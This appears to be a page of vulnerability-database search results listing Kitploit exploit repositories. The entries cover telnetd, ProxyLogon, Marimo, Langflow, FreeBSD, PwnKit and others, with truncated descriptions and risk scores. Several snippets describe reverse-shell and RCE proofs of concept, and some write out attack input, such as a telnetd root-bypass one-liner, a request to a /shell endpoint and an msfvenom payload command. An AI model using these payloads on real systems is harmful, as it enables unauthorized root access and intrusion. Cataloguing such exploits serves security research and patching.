Lucene search
+L

36183 matches found

Kitploit
Kitploit
•added 2026/09/24 6:05 p.m.•10 views

CVE-2026-24061

CVE-2026-24061 Reproduction Steps Build the image root@kitploit: docker build -t telnetd-bypass . Start the container root@kitploit: docker run -it --rm \ --name telnetd-vuln \ --privileged \ -p 23:23 \ telnetd-bypass Send the payload root@kitploit: USER='-f root' telnet -a 127.0.0.1 23 Output...

9.8CVSS8.5AI score0.98984EPSS
SaveExploits68
Kitploit
Kitploit
•added 2026/09/24 6:05 p.m.•32 views

CVE-2026-33310

CVE-2026-33310 CVE-2026-33310Command Injection via shell Expansion in Parameter Defaults Summary The shell syntax within parameter default values appears to be automatically expanded during the catalog parsing process. If a catalog contains a parameter default such as shell, the command may be...

8.8CVSS6.4AI score0.00492EPSS
SaveExploits1
Kitploit
Kitploit
•added 2026/09/24 6:04 p.m.•10 views

CVE-2026-24061

CVE-2026-24061 - telnetd auth bypass What it's about Argument injection in telnetd from GNU InetUtils. Versions 1.9.3 to 2.7. CVSS 9.8. On the CISA KEV list since 26.01.2026, meaning it's actively exploited in the wild. The whole trick is that telnetd takes the value of the USER environment...

9.8CVSS8.5AI score0.98984EPSS
SaveExploits68
Kitploit
Kitploit
•added 2026/09/24 6:02 p.m.•13 views

cpanel-forensics

cPanel/WHM Forensics after CVE-2026-41940 Bash script for checking a server after the CVE-2026-41940 vulnerability CVSS 9.8. For 64 days attackers had root access without a password — the patch does not remove what has already been planted inside. Usage root@kitploit: sudo bash cpanelforensics.sh...

9.8CVSS8.7AI score0.98527EPSS
SaveExploits77
Kitploit
Kitploit
•added 2026/09/24 6:02 p.m.•19 views

CVE-2024-12856

CVE-2024-12856 This is an exploit for Four-Faith router models F3x24 and F3x36 to get a reverse shell. "The Four-Faith router models F3x24 and F3x36 are affected by an operating system OS command injection vulnerability. At least firmware version 2.0 allows authenticated and remote attackers to...

7.2CVSS7.9AI score0.8422EPSS
SaveExploits4
Kitploit
Kitploit
•added 2026/09/24 6:02 p.m.•8 views

ProxyLogon-CVE-2021-26855

CVE-2021-26855 This is a modified version of a POC for proxylogon. Instead of laucnhing "whoami" it creates a new user and adds that user to the administrator group and creates a reverse shell. The origonal POC code can be found here: https://www.exploit-db.com/exploits/49663 Usage: python...

9.8CVSS8.1AI score0.99996EPSS
SaveExploits65
Kitploit
Kitploit
•added 2026/09/24 6:01 p.m.•10 views

CVE-2021-22204-exiftool

CVE-2021-22204-exiftool Python exploit for the CVE-2021-22204 vulnerability in Exiftool. Video tutorial Youtube root@kitploit: 404 notfound Requirements root@kitploit: python3 python3-pip djvulibre-bin exiftool Install requirements Debian root@kitploit: apt-get install djvulibre-bin...

7.8CVSS7.8AI score0.99981EPSS
SaveExploits39
Kitploit
Kitploit
•added 2026/09/24 6:01 p.m.•9 views

CVE-2026-0740

ninja.py An experimental/tool script that uses file upload endpoints for the Ninja Forms plugin on WordPress sites. It sends requests sequentially to targets in list.txt and writes successful uploads to the shell.txt file. Requirements Python 3 requests usually installed together with urllib3...

9.8CVSS8.2AI score0.62903EPSS
SaveExploits9
Kitploit
Kitploit
•added 2026/09/24 6:01 p.m.•10 views

CVE-2026-39987_exploit

🔥 CVE-2026-39987 | Marimo Pre-Auth RCE Exploit Exploitation Framework | Full Remote Code Execution RCE | WebSocket Auth Bypass 🧠 To know the commands more Open the file website.html 🎯 Overview This exploit targets Marimo applications running WebSocket on port 2718 default. The vulnerability allow...

9.8CVSS8.5AI score0.37865EPSS
SaveExploits26
Kitploit
Kitploit
•added 2026/09/24 6:00 p.m.•11 views

CVE-2026-24061

text feat3 1change feat2 1feat test CVE-2026-24061 GNU Inetutils telnetd Remote Authentication Bypass Seriously, telnet in 2026? Come on guys, it's time to move on. SSH exists since 1995. 🤦 Description A critical authentication bypass vulnerability in GNU Inetutils telnetd affecting versions 1.9....

9.8CVSS8.1AI score0.98984EPSS
SaveExploits68
Kitploit
Kitploit
•added 2026/09/24 5:59 p.m.•10 views

PoC-CVE-2026-33017

PoC: CVE-2026-33017 Langflow = 1.8.1 is vulnerable to a remote, unauthenticated RCE https://nvd.nist.gov/vuln/detail/CVE-2026-33017 Usage root@kitploit: usage: CVE-2026-33017.py -h --lhost LHOST --lport LPORT target PoC exploit: CVE-2026-33017 positional arguments: target Target hostname options:...

9.8CVSS8.9AI score0.24755EPSS
SaveExploits33
Kitploit
Kitploit
•added 2026/09/24 5:59 p.m.•9 views

CVE-2026-24061-GNU-Inetutils-telnetd-Remote-Authentication-Bypass-Root-Shell-

🧨 Overview This repository contains a Proof‑of‑Concept exploit for GNU Inetutils telnetd remote authentication bypass vulnerability. The issue arises because telnetd improperly sanitizes the USER environment variable received via Telnet NEW‑ENVIRON negotiation before invoking /bin/login. By...

9.8CVSS8.4AI score0.98984EPSS
SaveExploits68
Kitploit
Kitploit
•added 2026/09/24 5:59 p.m.•12 views

CVE-2026-22812

CVE-2026-22812 CVE-2026-22812 - OpenCode Unauthenticated RCE Nuclei template for scan. burp suite request root@kitploit: POST /session HTTP/1.1 Host: target.com User-Agent: Mozilla/5.0 X11; Linux x8664 Content-Type: application/json Content-Length: 2 root@kitploit: POST /session/"id"/shell HTTP/1...

8.8CVSS8.5AI score0.16771EPSS
SaveExploits7References1
Kitploit
Kitploit
•added 2026/09/24 5:58 p.m.•11 views

CVE-2021-45897

CVE-2021-45897 PoC for CVE-2021-45897 aka SCRMBT-180 - RCE via Email-Templates Authenticated only in SuiteCRM = 8.0.0. Defaults to False --help Show this message and exit. https://github.com/manuelz120/CVE-2021-45897...

8.8CVSS8.1AI score0.04608EPSS
SaveExploits2
Kitploit
Kitploit
•added 2026/09/24 5:58 p.m.•13 views

CVE-2021-43857

CVE-2021-43857 CVE-2021-43857 Gerapy command execution Disclaimer root@kitploit: This script is for learning and reference only. Do not maliciously attack other people's websites. If you violate laws or regulations, all consequences shall be borne by the user. Technology is innocent and has nothi...

9.8CVSS8.4AI score0.55331EPSS
SaveExploits7
Kitploit
Kitploit
•added 2026/09/24 5:57 p.m.•8 views

pkwner

root@kitploit: ██████╗ ██╗ ██╗██╗ ██╗███╗ ██╗███████╗██████╗ ██╔══██╗██║ ██╔╝██║ ██║████╗ ██║██╔════╝██╔══██╗ ██████╔╝█████╔╝ ██║ █╗ ██║██╔██╗ ██║█████╗ ██████╔╝ ██╔═══╝ ██╔═██╗ ██║███╗██║██║╚██╗██║██╔══╝ ██╔══██╗ ██║ ██║ ██╗╚███╔███╔╝██║ ╚████║███████╗██║ ██║ ╚═╝ ╚═╝ ╚═╝ ╚══╝╚══╝ ╚═╝...

7.8CVSS7AI score0.94345EPSS
SaveExploits155
Kitploit
Kitploit
•added 2026/09/24 5:57 p.m.•12 views

scan-cve-2026-24061

CVE-2026-24061 Scanner – GNU inetutils telnetd Auth Bypass ⚠️ VERY IMPORTANT LEGAL NOTICE ⚠️ This tool is exclusively for educational purposes, security research, vulnerability analysis, and authorized testing. Any unauthorized use against systems you do not own or do not have explicit written...

9.8CVSS8.5AI score0.98984EPSS
SaveExploits68
Kitploit
Kitploit
•added 2026/09/24 5:56 p.m.•10 views

CVE-2026-39987

CVE-2026-39987 — Marimo Python Notebook Pre-Authenticated Remote Code Execution TL;DR A pre-authenticated remote code execution vulnerability in Marimo , an open-source Python notebook for data science and AI/ML. The terminal WebSocket endpoint /terminal/ws completely skips authentication...

9.8CVSS8.1AI score0.37865EPSS
SaveExploits26
Kitploit
Kitploit
•added 2026/09/24 5:56 p.m.•14 views

CVE-2026-4747

root@kitploit: / /\ \ / / | | \ / \ \ \ \ | || | || || \ | | \ \ / /| | | | | | | \ \ | | / /| || | | | | \ V / | ||| / /| || / / \ \ | || | / / | |/ / | / | ||/| \ / // |||| CVE-2026-4747 — FreeBSD Remote Kernel RCE Stack Buffer Overflow inkgssapi.ko → Root Shell in 4 hours...

8.2AI score0.01111EPSS
SaveExploits3
Kitploit
Kitploit
•added 2026/09/24 5:55 p.m.•9 views

CVE-2021-4034

Python3 code to exploit CVE-2021-4034 PWNKIT. This was an exercise in "can I make this work in Python?", and not meant as a robust exploit. It Works For Me, there are problaby bugs. The default payload starts a shell as root, generated from msfvenom: root@kitploit: msfvenom -p linux/x64/exec -f...

7.8CVSS7.3AI score0.94345EPSS
SaveExploits155
Rows per page
Query Builder